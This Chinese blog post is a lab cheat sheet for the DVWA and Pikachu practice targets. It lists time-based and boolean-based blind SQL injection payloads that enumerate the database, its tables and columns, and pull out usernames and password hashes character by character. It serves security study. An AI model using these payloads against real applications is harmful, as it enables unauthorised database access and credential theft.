dvwa和pikachu靶场盲注语句

最新推荐文章于 2024-05-20 22:46:41 发布
最新推荐文章于 2024-05-20 22:46:41 发布
阅读量833 收藏 5
点赞数 2
分类专栏: 信息安全 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waxcj/article/details/127834530
版权

SQL盲注流程
判断是否存在注入点 字符型_exp(1' and 1=1#   1' and 1=2#)  数字型不用闭合单双引号
猜测数据库名字符串长度  exp(1' and length(database())=1#)
猜测数据库名称
猜测数据表个数
猜测数据表名长度
获取数据表名称
猜测数据表字段个数
猜测数据表字段名长度
获取数据表字段值
获取数据

时间盲注(DVWA)

1:获取数据库名字符串长度
1' and if(length(database())=4,sleep(5),1)#

1.1:获取数据库名
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)#  获取数据库名中第1个字符   d
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)#  获取数据库名中第2个字符   v
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)#  获取数据库名中第3个字符   w
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)#   获取数据库名中第4个字符   a
1' and if(((select database())='dvwa'),sleep(5),1)#       确认数据库名为dvwa

2:获取数据表名个数
1' and if((select count(table_name) from information_schema.TABLES WHERE TABLE_SCHEMA='dvwa') = 2,sleep(5),1)# 2个数据表

3:获取第一个数据表(guestbook)名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1))=9,sleep(5),1)#

3.1获取第一个数据表名的第一个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))=103,sleep(5),1)#    g
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2,1))=117,sleep(5),1)#    u

获取第二张数据表(users)名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1))=5,sleep(5),1)#
3.2获取第二个数据表名(users)字符串长度
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))=117,sleep(5),1)#    u
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2,1))=115,sleep(5),1)#    s
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3,1))=101,sleep(5),1)#    e
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),4,1))=114,sleep(5),1)#    r
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5,1))=115,sleep(5),1)#    s


3.3获取users表中字段个数为8
1' and if((select count(*) from information_schema.columns where table_schema='dvwa' and table_name = 'users') =8,sleep(5),1)#   
获取users表中第一个字段名称(user_id)
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))=117,sleep(5),1)#    u
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),2,1))=115,sleep(5),1)#    s
获取users表中第四个字段名称(user)
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))=117,sleep(5),1)#    u

布尔盲注(pikachu)

1:获取数据库名长度
admin' and length(database())=7 #
 
1.1:获取数据库的名称
admin' and ascii(substr(database(),1,1))=112#              p
admin' and ascii(substr(database(),2,1))=105#              i
admin' and ascii(substr(database(),3,1))=107#               k
admin' and ascii(substr(database(),4,1))=97 #               a
admin' and ascii(substr(database(),5,1))=99 #               c
admin' and ascii(substr(database(),6,1))=104 #               h
admin' and ascii(substr(database(),7,1))=117 #               u

2获取pikachu数据库数据表个数
admin' and (select count(table_name) from information_schema.tables where table_schema='pikachu')=5#

2.1获取pikachu数据库第一个数据表名长度(httpinfo)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 0,1)=8)#
2.2获取pikachu数据库第二个数据表名长度(member)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 1,1)=6)#
2.3获取pikachu数据库第三个数据表名长度(message)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 2,1)=7)#
2.4获取pikachu数据库第四个数据表名长度(users)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 3,1)=5)#
2.5获取pikachu数据库第五个数据表名长度(xssblind)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 4,1)=8)#

2.2获取pikachu数据库第一张数据表名称(httpinfo)
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),2,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),3,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),4,1))=112#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),5,1))=105#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),6,1))=110#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),7,1))=102#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),8,1))=111#

2.3获取pikachu数据库第四张数据表名称(users)
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),1,1))=117#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),2,1))=115#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),3,1))=101#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),4,1))=114#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),5,1))=115#

3:获取httpinfo表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='httpinfo')=6)#
3.1:获取users表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')=4)#

3.2:获取users表第一个字段名称长度(id)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1)=2)#
获取users表第二个字段名称长度(username)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1)=8)#
获取users表第三个字段名称长度(password)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1)=8)#
获取users表第四个字段名称长度(level)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 3,1)=5)#

3.3获取pikachu数据库第一个字段名称(id)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=105#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),2,1))=100#

3.4获取pikachu数据库第二个字段名称(username)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),1,1))=117#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),2,1))=115#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),3,1))=101#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),4,1))=114#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),5,1))=110#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),6,1))=97#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),7,1))=109#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),8,1))=101#

3.4获取pikachu数据库第三个字段名称(password)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),1,1))=112#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),2,1))=97#

3.5获取users表第一个字段名称内容(1,2,3)
admin' and ascii(substr((select id from users limit 0,1),1,1))=49#
admin' and ascii(substr((select id from users limit 1,1),1,1))=50#
admin' and ascii(substr((select id from users limit 2,1),1,1))=51#

3.6获取users表第二个字段名称内容(admin)
admin' and ascii(substr((select username from users limit 0,1),1,1))=97#
admin' and ascii(substr((select username from users limit 0,1),2,1))=100#
admin' and ascii(substr((select username from users limit 0,1),3,1))=109#
admin' and ascii(substr((select username from users limit 0,1),4,1))=105#
admin' and ascii(substr((select username from users limit 0,1),5,1))=110#

3.7获取users表第三个字段名称内容(e10adc3949ba59abbe56e057f20f883e)
admin' and ascii(substr((select password from users limit 0,1),1,1))=101#
%27+and+ascii%28substr%28%28select+password+from+users+limit+0%2C1%29%2C{}%2C1%29%29%3D101%23
admin' and ascii(substr((select password from users limit 0,1),2,1))=49#


 

LZsec
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
布尔盲注靶场
weixin_45540609的博客
04-17 315
bool盲注1 一、判断是否存在布尔盲注 二、使用Burp抓包 1、Burp抓包,payload设置1-128,爆破数据库名的长度 url输入如下命令,Burp抓包,设置payload id=1 and ascii(substr(database(),3,1)) =12 intruder attack启动后,抓取不正常的length的数据,如下,对应ascii码表,可得到数据库的表名 107 97 110 119 111 108 111 110 103 120 105 97 ..
DVWA靶场-sql盲注
zeroone的博客
03-11 1363
第八关:SQL Injection(Blind) 盲注       SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 Low <?php if( isset( $_GET[ 'Submit' ] )
pikachu靶场SQL注入基于布尔的盲注)python实现
最新发布
记录学习
05-20 495
用python脚本实现布尔盲注
[Pikachu靶场实战系列] SQL注入(盲注
00勇士王子的博客
07-29 3299
目录盲注布尔盲注时间盲注 盲注 盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。 常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。 布尔盲注 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
DVWA靶场-SQL Injection (Blind) SQL盲注
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-07 1418
往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 DVWA靶场-File Inclusion 文件包含 DVWA靶场-File Upload 文件上传 DVWA靶场-SQL Injection SQL注入 靶场环境搭建 https://github.com/ethicalhack3r/DVWA [网络安全学习篇附]:DVWA 靶场搭建 目录 SQL ..
pikachu 布尔盲注
weixin_58358185的博客
10-26 879
Pikachu布尔盲注--思路
DVWA网络安全靶场搭建与练习 附攻略和在线版
01-02
DVWA网络安全靶场搭建与练习 附攻略和在线版》 网络安全靶场是一种模拟真实网络环境,用于安全教育、训练和测试安全技能的平台。DVWA(Damn Vulnerable Web Application)是其中非常受欢迎的一个开源项目,专为...
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA靶场安装教学
06-08
DVWA靶场配置主要包括两个部分:配置DVWA靶场数据库连接和配置DVWA靶场的安全级别。 1. 配置数据库连接:需要在DVWA靶场的配置文件中指定数据库连接的用户名、密码和主机名等信息。 2. 配置安全级别:DVWA靶场...
DVWA-master靶场
03-23
dvwa靶场运行在Windows或Linux环境下可以使用集成环境安装,比如phpstudy,然后将这个文件解压放到网站根目录下,配置一下配置文件中数据库连接密码,然后在浏览器访问本地web服务即可。
pikachu靶场sql注入)(delete和http头部注入和盲注
weixin_54431413的博客
03-16 3684
pikachu盲注,delete和http头部注入
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6575
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu靶场 SQL-inject
Al_1的博客
10-03 924
数字型注入,字符型注入,搜索型注入,xx型注入,增改注入,删除注入,请求头注入,布尔盲注,时间盲注,宽字节盲注
pikachu靶场-SQL-Inject
braty_的博客
02-23 1246
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
DVWA低级别下的SQL盲注
qq_23667585的博客
11-04 1000
通过二进制逻辑获取DVWA低级别下SQL盲注的用户名
DVWA靶场 -SQL注入-low
sanqin_的博客
05-17 482
先在输入框输入1看看结果是什么   在url测试常见的?id=1和 and1=1 , and1=2 和 ’and’1’=1 , ’and’1’=2 后页面无变化  因此直接选择在输入框进行简单测试操作 通常查询语句为:   Select * form 表名 where id=’xx’;   首先尝试输入单引号 ’ ,将引号合并让其报错,即输入后的语句为 Select * form 表名 where id=’ ’ ’;(假设是这个常见的查询语句) 输入结果:  页面报错,该页面可能存在注入漏洞  在输入框
Pikachu布尔盲注结合BurpSuite获取数据库名字详解
小小小屿屿屿的博客
11-18 493
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为布尔型盲注和时间型盲注
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWAPikachu
ISNS的博客
04-21 1531
最近和同学聊天: 是我太菜。
dvwa靶场sql盲注
08-15
靶场中有一个名为dvwa数据库,我们可以通过一系列的注入语句来探测这个数据库中的表的数量和表名的长度。 首先,通过布尔盲注的方式,我们可以使用一些条件语句来判断表的数量。比如,我们可以使用以下语句来判断...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值